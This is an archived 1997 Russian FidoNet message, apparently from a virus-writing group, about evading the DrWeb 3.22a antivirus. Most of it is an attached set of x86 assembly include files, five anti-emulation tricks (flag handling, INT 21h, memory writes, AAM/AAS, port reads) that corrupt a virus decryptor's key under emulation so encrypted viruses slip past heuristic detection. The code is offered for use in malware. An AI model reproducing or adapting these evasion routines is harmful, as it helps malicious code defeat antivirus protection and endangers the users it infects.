To  : Igor Dikshew

Subj:

DrWeb 3.22a (part 2)

Привет Igor!

Смотрю я значит на дисплей, а там - 04 Jul 97 14:03,
Igor Dikshew пишет к Kostya Volkov, во- думаю, дай чего-нить скажу:

ID> сказал - я pассматpиваю pаботу эвpистика и эмулятоpа ни как одно
ID> целое, а как два совеpшенно pазных алгоpитма. для боpьбы с эвpистикам
ID> было пpинято условие достаточности - _виpус_должен_быть покpиптован.

новые методы, для старых идей. то, что было опубликовано в chaos a.d.
issue 3, данилов _частично_ пофиксил.

=== Cut ===
■ Сие файло было автоматически сгенерено by BATalia8.AutoCheck
======================== TRICK.INC ===========================
; TrickList for drweb 3.22a (c) Reminder (1997)

; Стартовые значения:
; bx - значение ключа расшифровки
; ax,si - неиспользуемые в расшифровщике регистры

;include trick_1.inc ; ■ Full Checked
;include trick_2.inc ; ■ Full Checked
;include trick_3.inc ; ■ Full Checked
;include trick_4.inc ; ■ Full Checked
;include trick_5.inc ; ■ Full Checked
======================== TRICK_1.INC ===========================
; trick_1 for drweb 3.22a (c) Reminder (1997)

; Hеспособность нормально эмулить внутренние команды проца.

xor ax,ax
push ax
popf
pushf
pop ax ; web возвpащает 0, вместо 2
sub al,2
add bl,al
======================== TRICK_2.INC ===========================
; trick_2 for drweb 3.22a (c) Reminder (1997)

; Hеспособность эмулить програмные прерывания

push es bx
mov ax,351eh
int 21h
mov al,byte ptr es:[bx+3] ; web возвpащает 0, вместо 2
pop bx es
sub al,2
add bl,al======================== TRICK_3.INC ===========================
; trick_3 for drweb 3.22a (c) Reminder (1997)

; Hеспособность эмулить обращения к памяти.

push ds
mov ax,060h
mov ds,ax
add bx,ax
mov ds:[0],ax
sub bx,ds:[0] ; web возвpащает 0 вместо 60h
pop ds
======================== TRICK_4.INC ===========================
; trick_4 for drweb 3.22a (c) Reminder (1997)

; Hеспособность нормально эмулить внутренние команды проца.

sub ax,ax
dec ax
aam ; web не снимает A flag, а надо
aas
add bx,ax
sub bx,1905h
; trick_5 for drweb 3.22a (c) Reminder (1997)

; Hеспособность эмулить порты

in al,2 ; web возвpащает не 0, а надо 0
add bl,al

.' [Death Virii Crew] [Crematorium fans Team] [WW] `.

Длинный список? Alt + Home - в начало, Alt + End - в конец
Пользовательского поиска